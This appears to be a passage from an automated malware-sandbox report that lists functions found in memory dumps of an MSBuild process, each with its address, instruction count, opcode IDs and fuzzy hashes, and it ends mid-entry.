                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fdefe1c5c1dc463b475fe40c2509afe53b303393f5c7e841bb54ca7e012eac47
                                                                                                                              • Instruction ID: b0eeaf9a82539341eb8eea0246c6c05b644613ede387157e8d96d5e3bbf2b0d7
                                                                                                                              • Opcode Fuzzy Hash: fdefe1c5c1dc463b475fe40c2509afe53b303393f5c7e841bb54ca7e012eac47
                                                                                                                              • Instruction Fuzzy Hash: D221F830304242CBDF151B3698A46BF369EAFD5749F188479D512CB3A9DE35CC4ADB41
                                                                                                                              Function 00CB8380 Relevance: .1, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 897f65d929c40be1431a3c5d21406438c32d4b58dbe125a9a2e4fd6bfe58de2c
                                                                                                                              • Instruction ID: 10e1d7474664b4aa24679c0e3ac2e870011e47a8aa8c778c35be148b64b5649f
                                                                                                                              • Opcode Fuzzy Hash: 897f65d929c40be1431a3c5d21406438c32d4b58dbe125a9a2e4fd6bfe58de2c
                                                                                                                              • Instruction Fuzzy Hash: 1921D430304202CBEB145A2684A47BF369FAFD4758F148439D512CB799EE75CC8AEB81
                                                                                                                              Function 00CB28F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 22d9471f1e1a883a0dbe015f37f204c9aa8f5e96e964990da9f1dd1709d151ec
                                                                                                                              • Instruction ID: 25a9fa973045b4a8318d543b0190f72e7cfbf2b8540241f9d05d3ff7f66bce74
                                                                                                                              • Opcode Fuzzy Hash: 22d9471f1e1a883a0dbe015f37f204c9aa8f5e96e964990da9f1dd1709d151ec
                                                                                                                              • Instruction Fuzzy Hash: F5218C35E0114A9FCF14DB24D4409EE77A5EBA9360F208559E82A9B350EB30EE46CBD1
                                                                                                                              Function 00C2D005 Relevance: .1, Instructions: 76COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3576515125.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_c2d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 626d58dd592003d3352c3edab99b377145831c4007a7018588960ef8a5e2d325
                                                                                                                              • Instruction ID: 6f815045e2f1a6d4d96737253644a47377e651419d6745eabcf539660fdcf9a8
                                                                                                                              • Opcode Fuzzy Hash: 626d58dd592003d3352c3edab99b377145831c4007a7018588960ef8a5e2d325
                                                                                                                              • Instruction Fuzzy Hash: C0313A7150E3C08FC707CB24D9A0705BF71AB47214F29C5DBD8898F6A3C22A980ACB62
                                                                                                                              Function 00C1D554 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3576400544.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_c1d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f80393222f318fa9445e65868b1232ec1ee61f63473209170a88a43e2843d77a
                                                                                                                              • Instruction ID: 8036d83465e0576f3ed96b63a0a4260a166e80231c61408b88aca8e90b80c31c
                                                                                                                              • Opcode Fuzzy Hash: f80393222f318fa9445e65868b1232ec1ee61f63473209170a88a43e2843d77a
                                                                                                                              • Instruction Fuzzy Hash: F62125B1504240EFDB04DF14D9C0F66BF66FB89318F20C56DE90A0B256C336D896EBA2
                                                                                                                              Function 00CB6300 Relevance: .1, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 46c95db08b74629d43be03622e1490a0a4caa044aac2b76b80a80140c8c42a13
                                                                                                                              • Instruction ID: 6f0bae01254d089b924c0f14957e389642e5cdc4f69240d5bf133741a3ad9a99
                                                                                                                              • Opcode Fuzzy Hash: 46c95db08b74629d43be03622e1490a0a4caa044aac2b76b80a80140c8c42a13
                                                                                                                              • Instruction Fuzzy Hash: 4221C035701A11CFC7159A2AC49497FB7E2EF89755B148578E816CB3A4CF34DD028B80
                                                                                                                              Function 00CBF72F Relevance: .1, Instructions: 73COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9e2113fdec522f7509cc9b472e24fd7aa39c76364999664dc1bc23cf4bf0ac88
                                                                                                                              • Instruction ID: 7eed27b7b9dd493cd0657ffefdcfd6c316667dbdce394c545169ca9627b74baa
                                                                                                                              • Opcode Fuzzy Hash: 9e2113fdec522f7509cc9b472e24fd7aa39c76364999664dc1bc23cf4bf0ac88
                                                                                                                              • Instruction Fuzzy Hash: 71312670D01359DFEB14CFA5D854BEEBBB2AF89304F108829D415BB280DB755A4ACF50
                                                                                                                              Function 00C2D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3576515125.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_c2d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 632d3eb94449479c0f6b45310a422b1a946a916dca1d7789b6cc242fb5eb74d7
                                                                                                                              • Instruction ID: 38392e162e52dbb3d3f464094bd3538f5333be253efa4ff7f2904a0ba7ec1107
                                                                                                                              • Opcode Fuzzy Hash: 632d3eb94449479c0f6b45310a422b1a946a916dca1d7789b6cc242fb5eb74d7
                                                                                                                              • Instruction Fuzzy Hash: 56213471504204EFDB14DF24E9C0B26BB61FB94314F30C56DE80A4B6A2C73AD847CB62
                                                                                                                              Function 00CB5649 Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 51e03207d7646e3a721d4bba61d0b64061a5ae7b07210e8ad3a5db129f0a4334
                                                                                                                              • Instruction ID: 284319a1b85bcd40301d7ca01d142ef21ad9dfb6bd18b57d9aae0c6caf23cd18
                                                                                                                              • Opcode Fuzzy Hash: 51e03207d7646e3a721d4bba61d0b64061a5ae7b07210e8ad3a5db129f0a4334
                                                                                                                              • Instruction Fuzzy Hash: 2121D171B06548DFCB019F64D4847EF3BB1EB99314F1040A9F8158B389DA388FAADB91
                                                                                                                              Function 00CB9761 Relevance: .1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b247d0afa98241f6b6f373a02fd8d9dafcae3f791fa5fb562b52374380ecb4c8
                                                                                                                              • Instruction ID: d3f4e7c0486be38c903790bc3ddbb17faecb4b381827a1dfdd349110de6a3186
                                                                                                                              • Opcode Fuzzy Hash: b247d0afa98241f6b6f373a02fd8d9dafcae3f791fa5fb562b52374380ecb4c8
                                                                                                                              • Instruction Fuzzy Hash: 60219A70E01248DFCB15DFA6D590AEEBFB6EF49304F248069E511F6294DB30DA41DB20
                                                                                                                              Function 00CB62F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e4ebb368fc8317b4a00b7cb1df64551fef90805f91d2cbacc01d4ac121da0b3
                                                                                                                              • Instruction ID: 3bedc688d5b9efdd268f8b5e0fb6f023a2127857af9c2d44fa5fc565cea35a9c
                                                                                                                              • Opcode Fuzzy Hash: 2e4ebb368fc8317b4a00b7cb1df64551fef90805f91d2cbacc01d4ac121da0b3
                                                                                                                              • Instruction Fuzzy Hash: EB110231705611CFC7159A2AC49497EB7E2FFC975171884B9E806CB3A4CF34DD028B90
                                                                                                                              Function 00CBF640 Relevance: .1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 832db636c357060e729a20f623c0dc03be0c86225c26e1ce94c7083cdf288a17
                                                                                                                              • Instruction ID: 57545dc78a9e3fa43f4a47833cd4f78da7ec99d2ffb234b33666d4384475dd3e
                                                                                                                              • Opcode Fuzzy Hash: 832db636c357060e729a20f623c0dc03be0c86225c26e1ce94c7083cdf288a17
                                                                                                                              • Instruction Fuzzy Hash: 71216FB0D0020ADFEB05EFA9D94079EBFF2FB85300F0081B9D55897365EB749A568B81
                                                                                                                              Function 00C1D54F Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3576400544.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_c1d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction ID: 6d47844016c66691f40dad00fcc53d45747f75021abfde766d136659970e07b4
                                                                                                                              • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction Fuzzy Hash: F7110376504280CFCF01CF00D5C0B56BF72FB84314F24C5A9E80A0B256C33AD956DBA2
                                                                                                                              Function 00CBF650 Relevance: .1, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9a4cf0ebf17b9ae0778fb3c1be06184c4d08a33be1b53983a711f4a1096c695b
                                                                                                                              • Instruction ID: 3040ab19372e94d3085af72cc90c1bd24728c9e3e3109bf7cc0feef32aa4d6b2
                                                                                                                              • Opcode Fuzzy Hash: 9a4cf0ebf17b9ae0778fb3c1be06184c4d08a33be1b53983a711f4a1096c695b
                                                                                                                              • Instruction Fuzzy Hash: 24114C70E0120ADFDB04EFA9D84079EBBF2FB85300F0095B9D1189B365EB749A468F81
                                                                                                                              Function 00CB5E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eccbb8d827afaabb0ff0a370a145b3970c4b12012c1217864631e9e0c8c92244
                                                                                                                              • Instruction ID: 8db1c8420ff5ec85bb4e36c841020458cf3477c37e9df9b47469f2f665b9d1be
                                                                                                                              • Opcode Fuzzy Hash: eccbb8d827afaabb0ff0a370a145b3970c4b12012c1217864631e9e0c8c92244
                                                                                                                              • Instruction Fuzzy Hash: 8D012632B04294AFCB129E689840AFF3FA6DBCA350F188069F440D7285CE368F199750
                                                                                                                              Function 00CB27FF Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab121b0046798ed0ff75157761d04566af2a773b83b7180bcbd0c4dd8c34ad07
                                                                                                                              • Instruction ID: 86dc2431e3be3cadaafa07a0597f98418d22743dfd1f46966e84b919b262d8b9
                                                                                                                              • Opcode Fuzzy Hash: ab121b0046798ed0ff75157761d04566af2a773b83b7180bcbd0c4dd8c34ad07
                                                                                                                              • Instruction Fuzzy Hash: 6511B074D1120ACFCB40EFA9D9845EEBBF0BB49310F10556AD905B2214EB305A95CF91
                                                                                                                              Function 00CBABD0 Relevance: .0, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ec0aac84699b2642d16cdc140f68eee2f4fe4be36f0d34942b22848b419d5a2
                                                                                                                              • Instruction ID: 708068e89a95fec6e44cfc036d801707871a43279892da65dbcc17c45ef335c2
                                                                                                                              • Opcode Fuzzy Hash: 9ec0aac84699b2642d16cdc140f68eee2f4fe4be36f0d34942b22848b419d5a2
                                                                                                                              • Instruction Fuzzy Hash: F20128317443108F87165A2E945466E7BEAEFC9B55B19807AE959CB372EE32CD02C341
                                                                                                                              Function 00CB9D59 Relevance: .0, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06444fe28d6388af1d77c2a9daefa7de8a1d22bd2b0720cbe508b4cf624771cd
                                                                                                                              • Instruction ID: 9dded999504ca9f8ea9a4eb40787d34ec153d8ad5af2cf67d18467410fe1dd83
                                                                                                                              • Opcode Fuzzy Hash: 06444fe28d6388af1d77c2a9daefa7de8a1d22bd2b0720cbe508b4cf624771cd
                                                                                                                              • Instruction Fuzzy Hash: 9CF068353001156FDB181EAA98509BBBBDBEBCD3A0F148429BB09C7351DE71CD1293A1
                                                                                                                              Function 00CBE8F7 Relevance: .0, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 879928c34b123c4643081f2fd8c950d8f624a81d6b7cee4e5c9d4899ce2c1424
                                                                                                                              • Instruction ID: afd6cfb82faafab440da37bbfa0db2202c3397235e6c9215417b6523b8329984
                                                                                                                              • Opcode Fuzzy Hash: 879928c34b123c4643081f2fd8c950d8f624a81d6b7cee4e5c9d4899ce2c1424
                                                                                                                              • Instruction Fuzzy Hash: 350116B8D0020AEFCB40DFA4E844ABEBBB1FB48300F10856AD914A3354D7715A16DF92
                                                                                                                              Function 00CB9C2C Relevance: .0, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d188d91f39a095a38309218a1c5997577e799d7d6b91e303aae7fb6d7e2e18c6
                                                                                                                              • Instruction ID: ff171fd06434cf9f03d52848828ec64a89fbc6bd7be7553332e9c69a29c7400e
                                                                                                                              • Opcode Fuzzy Hash: d188d91f39a095a38309218a1c5997577e799d7d6b91e303aae7fb6d7e2e18c6
                                                                                                                              • Instruction Fuzzy Hash: 32F08271E001189FCB108F6A9844AEEBBB5EBC8320F10C126EA18C3215D6314A158B50
                                                                                                                              Function 00CBAF5B Relevance: .0, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a017e244ef14bf8acde9728b2386e299ac575a4c62ef56d263437b20aab372ca
                                                                                                                              • Instruction ID: 2a8789da9b01891614e63e737507e135f6a4a814e6dadf679fcdb0a7443ada8f
                                                                                                                              • Opcode Fuzzy Hash: a017e244ef14bf8acde9728b2386e299ac575a4c62ef56d263437b20aab372ca
                                                                                                                              • Instruction Fuzzy Hash: 3AF03076644144EFCB018F95EC90ADDBFB2FF8D311F184496EA11AB261C6319925CB60
                                                                                                                              Function 00CB28A3 Relevance: .0, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0e4ce5a5311844f08b9aba7d5f66d412b95605c3c5af4d23ba9a2382ce6f25e7
                                                                                                                              • Instruction ID: 2cebb9f68693408a8f487cb509be90f706d891cdbdc4734e0eff346b02bd0101
                                                                                                                              • Opcode Fuzzy Hash: 0e4ce5a5311844f08b9aba7d5f66d412b95605c3c5af4d23ba9a2382ce6f25e7
                                                                                                                              • Instruction Fuzzy Hash: BEE08636D65767CACB02E7B0AC400FEFB34ADD5211B59455BC06136191EB30265EC7A1
                                                                                                                              Function 00CB28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be33620617ec0d5ee201fca93c66bc6654238247eaff376702c7fb0b48c7dea2
                                                                                                                              • Instruction ID: 76d11c61ae604af78a2df147a7dd9ff603c47e304809cef8dd32cb21c2aae4f9
                                                                                                                              • Opcode Fuzzy Hash: be33620617ec0d5ee201fca93c66bc6654238247eaff376702c7fb0b48c7dea2
                                                                                                                              • Instruction Fuzzy Hash: 16D05B31D2126B57CB00E7A5DC044EFF738EED5661B544626D51437140FB702659C7E1
                                                                                                                              Function 00CB6739 Relevance: .0, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6a31ea08ae54f1c8eafb03513e689673ff14ccab3c309004adcc41b551fb0571
                                                                                                                              • Instruction ID: 15aa513b8dc34a5068c610393ded3864dd9ce624782f013ab041d4d5c119a4d9
                                                                                                                              • Opcode Fuzzy Hash: 6a31ea08ae54f1c8eafb03513e689673ff14ccab3c309004adcc41b551fb0571
                                                                                                                              • Instruction Fuzzy Hash: 47E0123054D3CADFD603B374A88046A7F72AA83214B1999E5D0404EAAFDD35499ECF61
                                                                                                                              Function 00CB8EF7 Relevance: .0, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
                                                                                                                              • Instruction ID: 26642a36d1c80bbe4b8a3b3b8b2f6947f0c11d639e61f8dc9764ec18e1e937a8
                                                                                                                              • Opcode Fuzzy Hash: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
                                                                                                                              • Instruction Fuzzy Hash: EEC0123364D0642DAB3510AE7C81AFB9B5EC3C13B4E25027BF9ACE32009C424C8A82A4
                                                                                                                              Function 00CBAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 56df5004b4fa5303b8781a978b6dbbe65d10aca67e02d507147a708f289e5af7
                                                                                                                              • Instruction ID: f5680926ef876074b93702a2bd342cc9803c6f4be2b897d987d26d66df202758
                                                                                                                              • Opcode Fuzzy Hash: 56df5004b4fa5303b8781a978b6dbbe65d10aca67e02d507147a708f289e5af7
                                                                                                                              • Instruction Fuzzy Hash: FCD0673AB40108DFCB049F99E8809DDF776FB98221B04C516F925A3264C6319925DB60
                                                                                                                              Function 00CB6748 Relevance: .0, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e608c3ae70185bcc594d9e2ad8974d3890ff9d769f8836c88a68af30fe54cda
                                                                                                                              • Instruction ID: a161bf38b8b453520fea4b7dc79d527868e4621634a7e465d22d105e1d42c61c
                                                                                                                              • Opcode Fuzzy Hash: 8e608c3ae70185bcc594d9e2ad8974d3890ff9d769f8836c88a68af30fe54cda
                                                                                                                              • Instruction Fuzzy Hash: 1DC0123040470ECED501F765FC455597B3AE6802047909554A1050965DEE7459DA5A94

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00CBF974 Relevance: .3, Instructions: 265COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8042c7bcddece7ecce6638b6d1a166d83748a1420ae9741b5a05172cad2df8bc
                                                                                                                              • Instruction ID: 2e2eee76517009b023a58623a9d24a3a9b0709d262d2e7c569410f7a43c2c4fc
                                                                                                                              • Opcode Fuzzy Hash: 8042c7bcddece7ecce6638b6d1a166d83748a1420ae9741b5a05172cad2df8bc
                                                                                                                              • Instruction Fuzzy Hash: F3C17F74E01218CFEB14DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                              Function 00CBF4AC Relevance: .1, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2c5d41f2d53a151cf07ab3705d102706d1ba11ce6371c3a701e989447764308b
